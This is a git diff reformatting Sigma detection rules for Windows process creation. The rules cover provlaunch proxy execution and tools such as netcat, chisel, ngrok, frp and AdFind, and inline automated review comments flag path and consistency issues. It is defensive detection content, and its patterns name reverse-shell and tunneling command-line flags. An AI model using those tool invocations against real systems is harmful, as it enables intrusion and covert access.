b/sigma/builtin/process_creation/proc_creation_win_provlaunch_potential_abuse.yml 
@@ -1,15 +1,14 @@ title: Potential Provlaunch.EXE Binary Proxy Execution Abuse id: 7f5d1c9a-3e83-48df-95a7-2b98aae6c13c related: - - id: f9999590-1f94-4a34-a91e-951e47bedefd - type: similar - - id: 2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25 - type: similar - - id: 7021255e-5db3-4946-a8b9-0ba7a4644a69 - type: similar + - id: f9999590-1f94-4a34-a91e-951e47bedefd # CLI Abuse + type: similar + - id: 2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25 # CLI Registry + type: similar + - id: 7021255e-5db3-4946-a8b9-0ba7a4644a69 # Registry + type: similar status: experimental -description: Detects child processes of "provlaunch.exe" which might indicate potential - abuse to proxy execution. +description: Detects child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution. references: - https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/ - https://twitter.com/0gtweet/status/1674399582162153472 @@ -28,25 +27,26 @@ detection: selection: ParentProcessName|endswith: \provlaunch.exe filter_main_covered_children: - - NewProcessName|endswith: - - \calc.exe - - \cmd.exe - - \cscript.exe - - \mshta.exe - - \notepad.exe - - \powershell.exe - - \pwsh.exe - - \regsvr32.exe - - \rundll32.exe - - \wscript.exe - - NewProcessName|contains: - - :\PerfLogs\ - - :\Temp\ - - :\Users\Public\ - - \AppData\Temp\ - - \Windows\System32\Tasks\ - - \Windows\Tasks\ - - \Windows\Temp\ + # Note: this filter is here to avoid duplicate alerting by f9999590-1f94-4a34-a91e-951e47bedefd + - NewProcessName|endswith: + - \calc.exe + - \cmd.exe + - \cscript.exe + - \mshta.exe + - \notepad.exe + - \powershell.exe + - \pwsh.exe + - \regsvr32.exe + - \rundll32.exe + - \wscript.exe + - NewProcessName|contains: + - :\PerfLogs\ + - :\Temp\ + - :\Users\Public\ + - \AppData\Temp\ + - \Windows\System32\Tasks\ + - \Windows\Tasks\ + - \Windows\Temp\ condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unknown 
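Review bot: The `NewProcessName|contains` entry `\AppData\Temp\` in `filter_main_covered_children` does not correspond to the per-user temp directory, which is `\AppData\Local\Temp\`; a child launched from there is therefore not filtered here, and the sibling rule `f9999590-1f94-4a34-a91e-951e47bedefd` that the new note says this filter defers to carries the same string in its `selection_child`, so it will not match either. Unless `\AppData\Temp\` is intentional, change it to `\AppData\Local\Temp\` in both rules so the two stay complementary as the note intends. Because this filter and the sibling's selection are meant to be the same list, any future edit to one should be mirrored in the other; a comment pointing at the sibling's field name (`selection_child`) would make that dependency explicit.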
diff --git a/sigma/builtin/process_creation/proc_creation_win_provlaunch_susp_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_provlaunch_susp_child_process.yml index 137384ea2..5095f02a3 100644 --- a/sigma/builtin/process_creation/proc_creation_win_provlaunch_susp_child_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_provlaunch_susp_child_process.yml @@ -1,15 +1,14 @@ title: Suspicious Provlaunch.EXE Child Process id: f9999590-1f94-4a34-a91e-951e47bedefd related: - - id: 7f5d1c9a-3e83-48df-95a7-2b98aae6c13c - type: similar - - id: 2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25 - type: similar - - id: 7021255e-5db3-4946-a8b9-0ba7a4644a69 - type: similar + - id: 7f5d1c9a-3e83-48df-95a7-2b98aae6c13c # CLI Generic + type: similar + - id: 2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25 # CLI Registry + type: similar + - id: 7021255e-5db3-4946-a8b9-0ba7a4644a69 # Registry + type: similar status: experimental -description: Detects suspicious child processes of "provlaunch.exe" which might indicate - potential abuse to proxy execution. +description: Detects suspicious child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution. references: - https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/ - https://twitter.com/0gtweet/status/1674399582162153472 
@@ -28,25 +27,25 @@ detection: selection_parent: ParentProcessName|endswith: \provlaunch.exe selection_child: - - NewProcessName|endswith: - - \calc.exe - - \cmd.exe - - \cscript.exe - - \mshta.exe - - \notepad.exe - - \powershell.exe - - \pwsh.exe - - \regsvr32.exe - - \rundll32.exe - - \wscript.exe - - NewProcessName|contains: - - :\PerfLogs\ - - :\Temp\ - - :\Users\Public\ - - \AppData\Temp\ - - \Windows\System32\Tasks\ - - \Windows\Tasks\ - - \Windows\Temp\ + - NewProcessName|endswith: + - \calc.exe + - \cmd.exe + - \cscript.exe + - \mshta.exe + - \notepad.exe + - \powershell.exe + - \pwsh.exe + - \regsvr32.exe + - \rundll32.exe + - \wscript.exe + - NewProcessName|contains: + - :\PerfLogs\ + - :\Temp\ + - :\Users\Public\ + - \AppData\Temp\ + - \Windows\System32\Tasks\ + - \Windows\Tasks\ + - \Windows\Temp\ condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_psr_capture_screenshots.yml b/sigma/builtin/process_creation/proc_creation_win_psr_capture_screenshots.yml index 3bbbc404f..32420aa9e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_psr_capture_screenshots.yml +++ b/sigma/builtin/process_creation/proc_creation_win_psr_capture_screenshots.yml @@ -1,8 +1,7 @@ title: Screen Capture Activity Via Psr.EXE id: 2158f96f-43c2-43cb-952a-ab4580f32382 status: test -description: Detects execution of Windows Problem Steps Recorder (psr.exe), a utility - used to record the user screen and clicks. +description: Detects execution of Windows Problem Steps Recorder (psr.exe), a utility used to record the user screen and clicks. references: - https://lolbas-project.github.io/lolbas/Binaries/Psr/ - https://web.archive.org/web/20200229201156/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1493861893.pdf 
@@ -21,10 +20,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - /start - -start - NewProcessName|endswith: \Psr.exe + NewProcessName|endswith: \Psr.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_3proxy_execution.yml b/sigma/builtin/process_creation/proc_creation_win_pua_3proxy_execution.yml index ef44fc5e2..2cc03717c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_3proxy_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_3proxy_execution.yml @@ -19,11 +19,11 @@ detection: EventID: 4688 Channel: Security selection_img: - NewProcessName|endswith: \3proxy.exe + NewProcessName|endswith: \3proxy.exe selection_pe: Description: 3proxy - tiny proxy server - selection_params: - CommandLine|contains: .exe -i127.0.0.1 -p + selection_params: # param combos seen in the wild + CommandLine|contains: .exe -i127.0.0.1 -p condition: process_creation and (1 of selection_*) falsepositives: - Administrative activity diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_adfind_enumeration.yml b/sigma/builtin/process_creation/proc_creation_win_pua_adfind_enumeration.yml index 51ed13443..20af610d1 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_adfind_enumeration.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_adfind_enumeration.yml 
@@ -1,11 +1,10 @@ title: PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE id: 455b9d50-15a1-4b99-853f-8d37655a4c1b related: - - id: 9a132afa-654e-11eb-ae93-0242ac130002 - type: similar + - id: 9a132afa-654e-11eb-ae93-0242ac130002 + type: similar status: test -description: Detects active directory enumeration activity using known AdFind CLI - flags +description: Detects active directory enumeration activity using known AdFind CLI flags references: - https://www.joeware.net/freetools/tools/adfind/ - https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx @@ -23,8 +22,8 @@ detection: process_creation: EventID: 4688 Channel: Security - selection_password: - CommandLine|contains: + selection_password: # Listing password policy + CommandLine|contains: - lockoutduration - lockoutthreshold - lockoutobservationwindow @@ -33,10 +32,10 @@ detection: - minpwdlength - pwdhistorylength - pwdproperties - selection_enum_ad: - CommandLine|contains: -sc admincountdmp - selection_enum_exchange: - CommandLine|contains: -sc exchaddresses + selection_enum_ad: # Enumerate Active Directory Admins + CommandLine|contains: -sc admincountdmp + selection_enum_exchange: # Enumerate Active Directory Exchange AD Objects + CommandLine|contains: -sc exchaddresses condition: process_creation and (1 of selection_*) falsepositives: - Authorized administrative activity diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_adfind_susp_usage.yml b/sigma/builtin/process_creation/proc_creation_win_pua_adfind_susp_usage.yml index 9e6c64cd4..f747e59d5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_adfind_susp_usage.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_adfind_susp_usage.yml 
@@ -1,10 +1,10 @@ title: PUA - AdFind Suspicious Execution id: 9a132afa-654e-11eb-ae93-0242ac130002 related: - - id: 455b9d50-15a1-4b99-853f-8d37655a4c1b - type: similar - - id: 75df3b17-8bcc-4565-b89b-c9898acef911 - type: obsoletes + - id: 455b9d50-15a1-4b99-853f-8d37655a4c1b + type: similar + - id: 75df3b17-8bcc-4565-b89b-c9898acef911 + type: obsoletes status: test description: Detects AdFind execution with common flags seen used during attacks references: @@ -15,8 +15,7 @@ references: - https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx - https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md - https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1087.002/T1087.002.md#atomic-test-7---adfind---enumerate-active-directory-user-objects -author: Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, - oscd.community +author: Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community date: 2021/02/02 modified: 2023/03/05 tags: @@ -34,7 +33,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - domainlist - trustdmp - dcmodes diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_advanced_ip_scanner.yml b/sigma/builtin/process_creation/proc_creation_win_pua_advanced_ip_scanner.yml index eca988680..d227bf44e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_advanced_ip_scanner.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_advanced_ip_scanner.yml 
@@ -1,8 +1,7 @@ title: PUA - Advanced IP Scanner Execution id: bef37fa2-f205-4a7b-b484-0759bfd5f86f status: test -description: Detects the use of Advanced IP Scanner. Seems to be a popular tool for - ransomware groups. +description: Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups. references: - https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/ - https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html @@ -25,11 +24,11 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|contains: \advanced_ip_scanner - - OriginalFileName|contains: advanced_ip_scanner - - Description|contains: Advanced IP Scanner + - NewProcessName|contains: \advanced_ip_scanner + - OriginalFileName|contains: advanced_ip_scanner # Covers also advanced_ip_scanner_console.exe + - Description|contains: Advanced IP Scanner selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - /portable - /lng condition: process_creation and (1 of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_advanced_port_scanner.yml b/sigma/builtin/process_creation/proc_creation_win_pua_advanced_port_scanner.yml index 3cbc8d7e8..b20d2b473 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_advanced_port_scanner.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_advanced_port_scanner.yml 
@@ -19,11 +19,11 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|contains: \advanced_port_scanner - - OriginalFileName|contains: advanced_port_scanner - - Description|contains: Advanced Port Scanner + - NewProcessName|contains: \advanced_port_scanner + - OriginalFileName|contains: advanced_port_scanner # Covers also advanced_port_scanner_console.exe + - Description|contains: Advanced Port Scanner selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - /portable - /lng condition: process_creation and (1 of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_advancedrun_priv_user.yml b/sigma/builtin/process_creation/proc_creation_win_pua_advancedrun_priv_user.yml index 8663a68a4..a4a7a9cc3 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_advancedrun_priv_user.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_advancedrun_priv_user.yml @@ -1,11 +1,10 @@ title: PUA - AdvancedRun Suspicious Execution id: fa00b701-44c6-4679-994d-5a18afa8a707 related: - - id: d2b749ee-4225-417e-b20e-a8d2193cbb84 - type: similar + - id: d2b749ee-4225-417e-b20e-a8d2193cbb84 + type: similar status: test -description: Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, - SYSTEM, Local Service or Network Service accounts +description: Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts references: - https://twitter.com/splinter_code/status/1483815103279603714 - https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3 
@@ -26,20 +25,20 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - /EXEFilename - /CommandLine selection_runas: - - CommandLine|contains: - - ' /RunAs 8 ' - - ' /RunAs 4 ' - - ' /RunAs 10 ' - - ' /RunAs 11 ' - - CommandLine|endswith: - - /RunAs 8 - - /RunAs 4 - - /RunAs 10 - - /RunAs 11 + - CommandLine|contains: + - ' /RunAs 8 ' + - ' /RunAs 4 ' + - ' /RunAs 10 ' + - ' /RunAs 11 ' + - CommandLine|endswith: + - /RunAs 8 + - /RunAs 4 + - /RunAs 10 + - /RunAs 11 condition: process_creation and (all of selection*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_chisel.yml b/sigma/builtin/process_creation/proc_creation_win_pua_chisel.yml index c4f565ebc..9089c6e27 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_chisel.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_chisel.yml @@ -1,8 +1,8 @@ title: PUA - Chisel Tunneling Tool Execution id: 8b0e12da-d3c3-49db-bb4f-256703f380e5 related: - - id: cf93e05e-d798-4d9e-b522-b0248dc61eaf - type: similar + - id: cf93e05e-d798-4d9e-b522-b0248dc61eaf + type: similar status: test description: Detects usage of the Chisel tunneling tool via the commandline arguments references: @@ -23,13 +23,13 @@ detection: EventID: 4688 Channel: Security selection_img: - NewProcessName|endswith: \chisel.exe + NewProcessName|endswith: \chisel.exe selection_param1: - CommandLine|contains: + CommandLine|contains: - 'exe client ' - 'exe server ' selection_param2: - CommandLine|contains: + CommandLine|contains: - -socks5 - -reverse - ' r:' diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_cleanwipe.yml b/sigma/builtin/process_creation/proc_creation_win_pua_cleanwipe.yml index 9930e2db6..a782dc535 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_cleanwipe.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_cleanwipe.yml 
@@ -18,18 +18,18 @@ detection: EventID: 4688 Channel: Security selection1: - NewProcessName|endswith: \SepRemovalToolNative_x64.exe + NewProcessName|endswith: \SepRemovalToolNative_x64.exe selection2: - CommandLine|contains: --uninstall - NewProcessName|endswith: \CATClean.exe + CommandLine|contains: --uninstall + NewProcessName|endswith: \CATClean.exe selection3: - CommandLine|contains: -r - NewProcessName|endswith: \NetInstaller.exe + CommandLine|contains: -r + NewProcessName|endswith: \NetInstaller.exe selection4: - CommandLine|contains|all: + CommandLine|contains|all: - /uninstall - /enterprise - NewProcessName|endswith: \WFPUnins.exe + NewProcessName|endswith: \WFPUnins.exe condition: process_creation and (1 of selection*) falsepositives: - Legitimate administrative use (Should be investigated either way) diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_crassus.yml b/sigma/builtin/process_creation/proc_creation_win_pua_crassus.yml index 0551b83a9..582105a11 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_crassus.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_crassus.yml @@ -1,8 +1,7 @@ title: PUA - Crassus Execution id: 2c32b543-1058-4808-91c6-5b31b8bed6c5 status: experimental -description: Detects Crassus, a Windows privilege escalation discovery tool, based - on PE metadata characteristics. +description: Detects Crassus, a Windows privilege escalation discovery tool, based on PE metadata characteristics. references: - https://github.com/vu-ls/Crassus author: pH-T (Nextron Systems) @@ -18,9 +17,9 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \Crassus.exe - - OriginalFileName: Crassus.exe - - Description|contains: Crassus + - NewProcessName|endswith: \Crassus.exe + - OriginalFileName: Crassus.exe + - Description|contains: Crassus condition: process_creation and selection falsepositives: - Unlikely 
diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_csexec.yml b/sigma/builtin/process_creation/proc_creation_win_pua_csexec.yml index 50ca13bb3..e6e8b591f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_csexec.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_csexec.yml @@ -1,8 +1,7 @@ title: PUA - CsExec Execution id: d08a2711-ee8b-4323-bdec-b7d85e892b31 status: test -description: Detects the use of the lesser known remote execution tool named CsExec - a PsExec alternative +description: Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative references: - https://github.com/malcomvetter/CSExec - https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/ @@ -22,7 +21,7 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: \csexec.exe + NewProcessName|endswith: \csexec.exe selection_pe: Description: csexec condition: process_creation and (1 of selection*) diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_defendercheck.yml b/sigma/builtin/process_creation/proc_creation_win_pua_defendercheck.yml index 1b71c6eca..a8ad1b75a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_defendercheck.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_defendercheck.yml 
@@ -1,9 +1,7 @@ title: PUA - DefenderCheck Execution id: f0ca6c24-3225-47d5-b1f5-352bf07ecfa7 status: test -description: Detects the use of DefenderCheck, a tool to evaluate the signatures used - in Microsoft Defender. It can be used to figure out the strings / byte chains - used in Microsoft Defender to detect a tool and thus used for AV evasion. +description: Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion. references: - https://github.com/matterpreter/DefenderCheck author: Florian Roth (Nextron Systems) @@ -20,8 +18,8 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \DefenderCheck.exe - - Description: DefenderCheck + - NewProcessName|endswith: \DefenderCheck.exe + - Description: DefenderCheck condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_ditsnap.yml b/sigma/builtin/process_creation/proc_creation_win_pua_ditsnap.yml index e9e0ca4a4..31757f126 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_ditsnap.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_ditsnap.yml @@ -1,8 +1,7 @@ title: PUA - DIT Snapshot Viewer id: d3b70aad-097e-409c-9df2-450f80dc476b status: test -description: Detects the use of Ditsnap tool, an inspection tool for Active Directory - database, ntds.dit. +description: Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit. references: - https://thedfirreport.com/2020/06/21/snatch-ransomware/ - https://web.archive.org/web/20201124182207/https://github.com/yosqueoy/ditsnap 
@@ -20,8 +19,8 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \ditsnap.exe - - CommandLine|contains: ditsnap.exe + - NewProcessName|endswith: \ditsnap.exe + - CommandLine|contains: ditsnap.exe condition: process_creation and selection falsepositives: - Legitimate admin usage diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_frp.yml b/sigma/builtin/process_creation/proc_creation_win_pua_frp.yml index 1a2a66db3..dcdeae0fc 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_frp.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_frp.yml @@ -1,8 +1,7 @@ title: PUA - Fast Reverse Proxy (FRP) Execution id: 32410e29-5f94-4568-b6a3-d91a8adad863 status: test -description: Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to - help you expose a local server behind a NAT or firewall to the Internet. +description: Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet. references: - https://asec.ahnlab.com/en/38156/ - https://github.com/fatedier/frp 
@@ -20,19 +19,20 @@ detection: EventID: 4688 Channel: Security selection_img: - NewProcessName|endswith: + NewProcessName|endswith: - \frpc.exe - \frps.exe selection_cli: - CommandLine|contains: \frpc.ini + CommandLine|contains: \frpc.ini selection_hashes: - - Hashes|contains: - - MD5=7D9C233B8C9E3F0EA290D2B84593C842 - - SHA1=06DDC9280E1F1810677935A2477012960905942F - - SHA256=57B0936B8D336D8E981C169466A15A5FD21A7D5A2C7DAF62D5E142EE860E387C - - md5: 7d9c233b8c9e3f0ea290d2b84593c842 - - sha1: 06ddc9280e1f1810677935a2477012960905942f - - sha256: 57b0936b8d336d8e981c169466a15a5fd21a7d5a2c7daf62d5e142ee860e387c + # v0.44.0 + - Hashes|contains: + - MD5=7D9C233B8C9E3F0EA290D2B84593C842 + - SHA1=06DDC9280E1F1810677935A2477012960905942F + - SHA256=57B0936B8D336D8E981C169466A15A5FD21A7D5A2C7DAF62D5E142EE860E387C + - md5: 7d9c233b8c9e3f0ea290d2b84593c842 + - sha1: 06ddc9280e1f1810677935a2477012960905942f + - sha256: 57b0936b8d336d8e981c169466a15a5fd21a7d5a2c7daf62d5e142ee860e387c condition: process_creation and (1 of selection_*) falsepositives: - Legitimate use diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_iox.yml b/sigma/builtin/process_creation/proc_creation_win_pua_iox.yml index 614a059ab..a968537ce 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_iox.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_iox.yml @@ -1,8 +1,7 @@ title: PUA- IOX Tunneling Tool Execution id: d7654f02-e04b-4934-9838-65c46f187ebc status: test -description: Detects the use of IOX - a tool for port forwarding and intranet proxy - purposes +description: Detects the use of IOX - a tool for port forwarding and intranet proxy purposes references: - https://github.com/EddieIvan01/iox author: Florian Roth (Nextron Systems) 
@@ -19,21 +18,22 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: \iox.exe + NewProcessName|endswith: \iox.exe selection_commandline: - CommandLine|contains: + CommandLine|contains: - '.exe fwd -l ' - '.exe fwd -r ' - '.exe proxy -l ' - '.exe proxy -r ' selection_hashes: - - Hashes|contains: - - MD5=9DB2D314DD3F704A02051EF5EA210993 - - SHA1=039130337E28A6623ECF9A0A3DA7D92C5964D8DD - - SHA256=C6CF82919B809967D9D90EA73772A8AA1C1EB3BC59252D977500F64F1A0D6731 - - md5: 9db2d314dd3f704a02051ef5ea210993 - - sha1: 039130337e28a6623ecf9a0a3da7d92c5964d8dd - - sha256: c6cf82919b809967d9d90ea73772a8aa1c1eb3bc59252d977500f64f1a0d6731 + # v0.4 + - Hashes|contains: + - MD5=9DB2D314DD3F704A02051EF5EA210993 + - SHA1=039130337E28A6623ECF9A0A3DA7D92C5964D8DD + - SHA256=C6CF82919B809967D9D90EA73772A8AA1C1EB3BC59252D977500F64F1A0D6731 + - md5: 9db2d314dd3f704a02051ef5ea210993 + - sha1: 039130337e28a6623ecf9a0a3da7d92c5964d8dd + - sha256: c6cf82919b809967d9d90ea73772a8aa1c1eb3bc59252d977500f64f1a0d6731 condition: process_creation and (1 of selection*) falsepositives: - Legitimate use diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_netcat.yml b/sigma/builtin/process_creation/proc_creation_win_pua_netcat.yml index 02aab1d31..a3911e288 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_netcat.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_netcat.yml 
@@ -1,9 +1,7 @@ title: PUA - Netcat Suspicious Execution id: e31033fc-33f0-4020-9a16-faf9b31cbf08 status: test -description: Detects execution of Netcat. Adversaries may use a non-application layer - protocol for communication between host and C2 server or among infected hosts - within a network +description: Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network references: - https://nmap.org/ncat/ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md @@ -22,17 +20,20 @@ detection: EventID: 4688 Channel: Security selection_img: - NewProcessName|endswith: + # can not use OriginalFileName as is empty + NewProcessName|endswith: - \nc.exe - \ncat.exe - \netcat.exe selection_cmdline: - CommandLine|contains: + # Typical command lines + CommandLine|contains: - ' -lvp ' - ' -lvnp' - ' -l -v -p ' - ' -lv -p ' - ' -l --proxy-type http ' + # - ' --exec cmd.exe ' # Not specific enough for netcat - ' -vnl --exec ' - ' -vnl -e ' - ' --lua-exec ' diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_ngrok.yml b/sigma/builtin/process_creation/proc_creation_win_pua_ngrok.yml index 932e193bd..01fdd3528 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_ngrok.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_ngrok.yml 
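Review bot: The new comment `# can not use OriginalFileName as is empty` in the second hunk (`@@ -22,17 +20,20 @@`) reads awkwardly and does not say for which events the field is empty; `# OriginalFileName is empty for these binaries, so match on NewProcessName only` states the reason clearly. In the same hunk `' -lvnp'` is the only command-line pattern without a trailing space while its siblings (`' -lvp '`, `' -l -v -p '`, `' -lv -p '`) all have one; if that is deliberate a short comment would make it clear, otherwise it should be aligned with the rest. The `selection_cmdline` list continues past the end of the hunk.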
@@ -1,12 +1,9 @@ title: PUA - Ngrok Execution id: ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31 status: test -description: 'Detects the use of Ngrok, a utility used for port forwarding and tunneling, - often used by threat actors to make local protected services publicly available. - +description: | + Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available. Involved domains are bin.equinox.io for download and *.ngrok.io for connections. - - ' references: - https://ngrok.com/docs - https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html @@ -29,26 +26,26 @@ detection: EventID: 4688 Channel: Security selection1: - CommandLine|contains: + CommandLine|contains: - ' tcp 139' - ' tcp 445' - ' tcp 3389' - ' tcp 5985' - ' tcp 5986' selection2: - CommandLine|contains|all: + CommandLine|contains|all: - ' start ' - --all - --config - .yml selection3: - CommandLine|contains: + CommandLine|contains: - ' tcp ' - ' http ' - ' authtoken ' - NewProcessName|endswith: ngrok.exe + NewProcessName|endswith: ngrok.exe selection4: - CommandLine|contains: + CommandLine|contains: - '.exe authtoken ' - .exe start --all condition: process_creation and (1 of selection*) diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_nimgrab.yml b/sigma/builtin/process_creation/proc_creation_win_pua_nimgrab.yml index d0ede0ad4..e459fac7e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_nimgrab.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_nimgrab.yml 
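Review bot: In the second hunk (`@@ -29,26 +26,26 @@`), `NewProcessName|endswith: ngrok.exe` in `selection3` has no leading path separator, unlike every other image match in this commit (`\chisel.exe`, `\iox.exe`, `\npc.exe`, …), so any image whose file name merely ends in those characters satisfies it. If the intent is to also match renamed builds that keep the suffix, that deserves a comment on the line; otherwise I would write `NewProcessName|endswith: \ngrok.exe` for consistency with the sibling rules.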
@@ -1,8 +1,7 @@ title: PUA - Nimgrab Execution id: 74a12f18-505c-4114-8d0b-8448dd5485c6 status: test -description: Detects the usage of nimgrab, a tool bundled with the Nim programming - framework and used for downloading files. +description: Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files. references: - https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md author: frack113 @@ -19,16 +18,16 @@ detection: EventID: 4688 Channel: Security selection_name: - NewProcessName|endswith: \nimgrab.exe + NewProcessName|endswith: \nimgrab.exe selection_hashes: Hashes|contains: - MD5=2DD44C3C29D667F5C0EF5F9D7C7FFB8B - SHA256=F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559 - IMPHASH=C07FDDD21D123EA9B3A08EEF44AAAC45 selection_hash: - - md5: 2DD44C3C29D667F5C0EF5F9D7C7FFB8B - - sha256: F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559 - - Imphash: C07FDDD21D123EA9B3A08EEF44AAAC45 + - md5: 2DD44C3C29D667F5C0EF5F9D7C7FFB8B + - sha256: F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559 + - Imphash: C07FDDD21D123EA9B3A08EEF44AAAC45 condition: process_creation and (1 of selection_*) falsepositives: - Legitimate use of Nim on a developer systems diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_nircmd.yml b/sigma/builtin/process_creation/proc_creation_win_pua_nircmd.yml index 3e4099fb3..22488b7be 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_nircmd.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_nircmd.yml 
